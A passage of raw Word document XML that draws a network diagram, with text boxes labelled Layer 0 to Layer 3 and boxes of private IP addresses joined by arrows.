                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="380677" y="2530399"/>
                                <a:pt x="123192" y="2461957"/>
                                <a:pt x="0" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-35710" y="2280366"/>
                                <a:pt x="25687" y="2171207"/>
                                <a:pt x="0" y="2036826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-25687" y="1902445"/>
                                <a:pt x="32711" y="1758175"/>
                                <a:pt x="0" y="1533906"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-32711" y="1309637"/>
                                <a:pt x="2904" y="1216577"/>
                                <a:pt x="0" y="1005840"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-2904" y="795103"/>
                                <a:pt x="26318" y="748773"/>
                                <a:pt x="0" y="528066"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-26318" y="307359"/>
                                <a:pt x="33719" y="108309"/>
                                <a:pt x="0" y="0"/>
                              </a:cubicBezTo>
                              <a:close/>
                            </a:path>
                            <a:path w="1555750" h="2514600" stroke="0" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="135292" y="-27253"/>
                                <a:pt x="251554" y="30865"/>
                                <a:pt x="503026" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="754498" y="-30865"/>
                                <a:pt x="749176" y="18235"/>
                                <a:pt x="974937" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1200698" y="-18235"/>
                                <a:pt x="1413542" y="61971"/>
                                <a:pt x="1555750" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1587186" y="153225"/>
                                <a:pt x="1506154" y="317625"/>
                                <a:pt x="1555750" y="477774"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1605346" y="637923"/>
                                <a:pt x="1508431" y="825150"/>
                                <a:pt x="1555750" y="930402"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1603069" y="1035654"/>
                                <a:pt x="1526507" y="1193721"/>
                                <a:pt x="1555750" y="1383030"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1584993" y="1572339"/>
                                <a:pt x="1536717" y="1738140"/>
                                <a:pt x="1555750" y="1885950"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1574783" y="2033760"/>
                                <a:pt x="1498049" y="2380018"/>
                                <a:pt x="1555750" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1393722" y="2523748"/>
                                <a:pt x="1223983" y="2489946"/>
                                <a:pt x="1068282" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="912581" y="2539254"/>
                                <a:pt x="696304" y="2499296"/>
                                <a:pt x="549698" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="403092" y="2529904"/>
                                <a:pt x="257642" y="2512325"/>
                                <a:pt x="0" y="2514600"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-38751" y="2278287"/>
                                <a:pt x="15550" y="2251764"/>
                                <a:pt x="0" y="2036826"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-15550" y="1821888"/>
                                <a:pt x="49854" y="1668524"/>
                                <a:pt x="0" y="1559052"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-49854" y="1449580"/>
                                <a:pt x="32610" y="1227588"/>
                                <a:pt x="0" y="1005840"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-32610" y="784092"/>
                                <a:pt x="28754" y="708345"/>
                                <a:pt x="0" y="452628"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-28754" y="196911"/>
                                <a:pt x="47029" y="136757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cmpd="thickThin">
                          <a:solidFill>
                            <a:schemeClr val="accent4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D473AE" id="Rectangle 24" o:spid="_x0000_s1026" style="position:absolute;margin-left:-16.7pt;margin-top:12.45pt;width:122.5pt;height:198pt;z-index:25165823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" fillcolor="white [3201]" strokecolor="#0f9ed5 [3207]" strokeweight="1pt">
                <v:stroke linestyle="thickThin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C89795A" w14:textId="7E802735" w:rsidR="00326FC5" w:rsidRDefault="00587BF0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CF9C1D4" wp14:editId="43D7FB45">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5588000</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>92710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="914400" cy="285750"/>
                <wp:effectExtent l="0" t="0" r="13970" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="195501337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49BBFB4" w14:textId="13D89E0D" w:rsidR="00587BF0" w:rsidRPr="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00587BF0">
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>Layer 3</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="76163BD9" w14:textId="77777777" w:rsidR="00587BF0" w:rsidRPr="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0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F9C1D4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40pt;margin-top:7.3pt;width:1in;height:22.5pt;z-index:2516971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" fillcolor="white [3201]" strokecolor="red" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="549BBFB4" w14:textId="13D89E0D" w:rsidR="00587BF0" w:rsidRPr="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00587BF0">
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Layer </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00587BF0">
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>3</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="76163BD9" w14:textId="77777777" w:rsidR="00587BF0" w:rsidRPr="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0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03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08E6D3" wp14:editId="5DEED9D9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2009775</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>89535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="914400" cy="285750"/>
                <wp:effectExtent l="0" t="0" r="13970" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="151021254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38EFF95A" w14:textId="46F94D23" w:rsidR="0095055D" w:rsidRPr="00587BF0" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="4EA72E" w:themeColor="accent6"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00587BF0">
                              <w:rPr>
                                <w:color w:val="4EA72E" w:themeColor="accent6"/>
                              </w:rPr>
                              <w:t>Layer 1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="693DD220" w14:textId="77777777" w:rsidR="0095055D" w:rsidRPr="00587BF0" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="4EA72E" w:themeColor="accent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8E6D3" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:158.25pt;margin-top:7.05pt;width:1in;height:22.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" fillcolor="white [3201]" strokecolor="#4ea72e [3209]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="38EFF95A" w14:textId="46F94D23" w:rsidR="0095055D" w:rsidRPr="00587BF0" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="4EA72E" w:themeColor="accent6"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00587BF0">
                        <w:rPr>
                          <w:color w:val="4EA72E" w:themeColor="accent6"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Layer </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00587BF0">
                        <w:rPr>
                          <w:color w:val="4EA72E" w:themeColor="accent6"/>
                        </w:rPr>
                        <w:t>1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="693DD220" w14:textId="77777777" w:rsidR="0095055D" w:rsidRPr="00587BF0" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="4EA72E" w:themeColor="accent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03B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EC68EB" wp14:editId="6B573174">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3819525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>89535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="914400" cy="285750"/>
                <wp:effectExtent l="0" t="0" r="13970" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="745926369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2869248D" w14:textId="3AB4FB55" w:rsidR="00AA03B0" w:rsidRPr="00587BF0" w:rsidRDefault="00AA03B0" w:rsidP="00AA03B0">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="E97132" w:themeColor="accent2"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00587BF0">
                              <w:rPr>
                                <w:color w:val="E97132" w:themeColor="accent2"/>
                              </w:rPr>
                              <w:t>Layer 2</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="64AC09E4" w14:textId="77777777" w:rsidR="00AA03B0" w:rsidRPr="00587BF0" w:rsidRDefault="00AA03B0" w:rsidP="00AA03B0">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="E97132" w:themeColor="accent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C68EB" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:300.75pt;margin-top:7.05pt;width:1in;height:22.5pt;z-index:2516828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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2869248D" w14:textId="3AB4FB55" w:rsidR="00AA03B0" w:rsidRPr="00587BF0" w:rsidRDefault="00AA03B0" w:rsidP="00AA03B0">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="E97132" w:themeColor="accent2"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00587BF0">
                        <w:rPr>
                          <w:color w:val="E97132" w:themeColor="accent2"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Layer </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00587BF0">
                        <w:rPr>
                          <w:color w:val="E97132" w:themeColor="accent2"/>
                        </w:rPr>
                        <w:t>2</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="64AC09E4" w14:textId="77777777" w:rsidR="00AA03B0" w:rsidRPr="00587BF0" w:rsidRDefault="00AA03B0" w:rsidP="00AA03B0">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="E97132" w:themeColor="accent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03B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8CCBB7" wp14:editId="2F284FEC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>180975</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>156210</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="914400" cy="285750"/>
                <wp:effectExtent l="0" t="0" r="13970" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="95872621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4"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="273023B2" w14:textId="00B95000" w:rsidR="0095055D" w:rsidRPr="00587BF0" w:rsidRDefault="0095055D">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="156082" w:themeColor="accent1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00587BF0">
                              <w:rPr>
                                <w:color w:val="156082" w:themeColor="accent1"/>
                              </w:rPr>
                              <w:t>Layer 0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="23FA3CE1" w14:textId="0C390164" w:rsidR="0095055D" w:rsidRPr="00587BF0" w:rsidRDefault="0095055D">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="156082" w:themeColor="accen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CCBB7" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:14.25pt;margin-top:12.3pt;width:1in;height:22.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" fillcolor="white [3201]" strokecolor="#0f9ed5 [3207]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="273023B2" w14:textId="00B95000" w:rsidR="0095055D" w:rsidRPr="00587BF0" w:rsidRDefault="0095055D">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="156082" w:themeColor="accent1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00587BF0">
                        <w:rPr>
                          <w:color w:val="156082" w:themeColor="accent1"/>
                        </w:rPr>
                        <w:t>Layer 0</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="23FA3CE1" w14:textId="0C390164" w:rsidR="0095055D" w:rsidRPr="00587BF0" w:rsidRDefault="0095055D">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="156082" w:themeColor="accen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1B6DE97" w14:textId="2C499870" w:rsidR="00326FC5" w:rsidRDefault="00326FC5" w:rsidP="005F107C"/>
    <w:p w14:paraId="2ADFD8F6" w14:textId="71A898E6" w:rsidR="00326FC5" w:rsidRDefault="00587BF0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3F929E" wp14:editId="1BA076F5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5276850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>158750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="175266193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80640" w14:textId="3ED5C940" w:rsidR="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.93.100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33F929E" id="Rounded Rectangle 23" o:spid="_x0000_s1030" style="position:absolute;margin-left:415.5pt;margin-top:12.5pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="48D80640" w14:textId="3ED5C940" w:rsidR="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.9</w:t>
                      </w:r>
                      <w:r>
                        <w:t>3</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r>
                        <w:t>100</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA03B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5ADABD3" wp14:editId="3972B4AE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3577590</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>156845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="394423881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CB5A9" w14:textId="29BE6B03" w:rsidR="00AA03B0" w:rsidRDefault="00AA03B0" w:rsidP="00AA03B0">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.92.1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ADABD3" id="_x0000_s1031" style="position:absolute;margin-left:281.7pt;margin-top:12.35pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="259CB5A9" w14:textId="29BE6B03" w:rsidR="00AA03B0" w:rsidRDefault="00AA03B0" w:rsidP="00AA03B0">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.9</w:t>
                      </w:r>
                      <w:r>
                        <w:t>2</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA03B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9B0611" wp14:editId="7444DAD9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1666875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>136525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="559440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389F0C" w14:textId="79043720" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.91.1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9B0611" id="_x0000_s1032" style="position:absolute;margin-left:131.25pt;margin-top:10.75pt;width:101.25pt;height:3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" fillcolor="white [3201]" strokecolor="#4ea72e [3209]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="11389F0C" w14:textId="79043720" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.1</w:t>
                      </w:r>
                      <w:r>
                        <w:t>68</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r>
                        <w:t>91</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w: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13379AC" w14:textId="1B8FAB3A" w:rsidR="00326FC5" w:rsidRDefault="00AA03B0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568D9A" wp14:editId="0DC221D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2886075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>48895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="758825" cy="292100"/>
                <wp:effectExtent l="12700" t="12700" r="28575" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1627791657" name="Left-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58825" cy="29210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CD5C0B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Left-Right Arrow 28" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:227.25pt;margin-top:3.85pt;width:59.75pt;height:23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" adj="4157" fillcolor="#156082 [3204]" strokecolor="#030e13 [484]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F879C1" w14:textId="440DAAF0" w:rsidR="00326FC5" w:rsidRDefault="00587BF0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03D291" wp14:editId="7756E599">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4578350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>90169</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="85090" cy="415925"/>
                <wp:effectExtent l="0" t="25400" r="156210" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="2094231071" name="Curved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90" cy="415925"/>
                        </a:xfrm>
                        <a:prstGeom prst="curvedConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 261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C3A3A1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27" o:spid="_x0000_s1026" type="#_x0000_t38" style="position:absolute;margin-left:360.5pt;margin-top:7.1pt;width:6.7pt;height:32.7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" adj="56429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D76719" wp14:editId="1F9B45C0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4829175</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>88900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="447675" cy="415925"/>
                <wp:effectExtent l="0" t="25400" r="22225" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="1720720135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415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DF9A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380.25pt;margin-top:7pt;width:35.25pt;height:32.7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" strokecolor="#156082 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBA00C9" w14:textId="7D499712" w:rsidR="00326FC5" w:rsidRDefault="00AA03B0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6FD1B5" wp14:editId="2B26FDC4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-57150</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>80645</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1209675" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="1086568929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3326D" w14:textId="77777777" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>172.17.17.203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16FD1B5" id="_x0000_s1033" style="position:absolute;margin-left:-4.5pt;margin-top:6.35pt;width:95.25pt;height:39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" fillcolor="white [3201]" strokecolor="#0f9ed5 [3207]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5883326D" w14:textId="77777777" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>172.17.17.203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050B0DA" w14:textId="0B3588F3" w:rsidR="00326FC5" w:rsidRDefault="005A3D59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6F1FBE" wp14:editId="17167893">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2933700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>187959</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="600075" cy="95250"/>
                <wp:effectExtent l="0" t="0" r="47625" b="57150"/>
                <wp:wrapNone/>
                <wp:docPr id="98242880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5480E" id="Straight Arrow Connector 29" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:231pt;margin-top:14.8pt;width:47.25pt;height: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" strokecolor="#156082 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00587BF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8652125" wp14:editId="7B2E8D64">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4752975</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>135890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="590550" cy="292100"/>
                <wp:effectExtent l="12700" t="12700" r="31750" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1271994273" name="Left-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90550" cy="29210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129D0" id="Left-Right Arrow 28" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:374.25pt;margin-top:10.7pt;width:46.5pt;height:23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" adj="5342" fillcolor="#156082 [3204]" strokecolor="#030e13 [484]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00587BF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6CBF18" wp14:editId="30427290">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5276850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>66040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="756592911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D5F4A1" w14:textId="695CC09A" w:rsidR="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.93.31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6CBF18" id="_x0000_s1034" style="position:absolute;margin-left:415.5pt;margin-top:5.2pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="29D5F4A1" w14:textId="695CC09A" w:rsidR="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.9</w:t>
                      </w:r>
                      <w:r>
                        <w:t>3</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.31</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA03B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2C290D" wp14:editId="45E916F6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3533775</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>65405</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="149259117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B9F6A9" w14:textId="46D90E70" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.92.31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2C290D" id="_x0000_s1035" style="position:absolute;margin-left:278.25pt;margin-top:5.15pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1FB9F6A9" w14:textId="46D90E70" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.9</w:t>
                      </w:r>
                      <w:r>
                        <w:t>2</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r>
                        <w:t>31</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA03B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2E03D9" wp14:editId="0C4E13A6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1152525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>135890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="419100" cy="742950"/>
                <wp:effectExtent l="0" t="0" r="38100" b="31750"/>
                <wp:wrapNone/>
                <wp:docPr id="208315183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1888" id="Straight Arrow Connector 26" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:90.75pt;margin-top:10.7pt;width:33pt;height:5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" strokecolor="#156082 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA03B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FB7496" wp14:editId="00EF5E8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1666875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>20955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="151241851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DB5F6" w14:textId="64C45EAA" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.91.22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FB7496" id="_x0000_s1036" style="position:absolute;margin-left:131.25pt;margin-top:1.65pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#4ea72e [3209]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
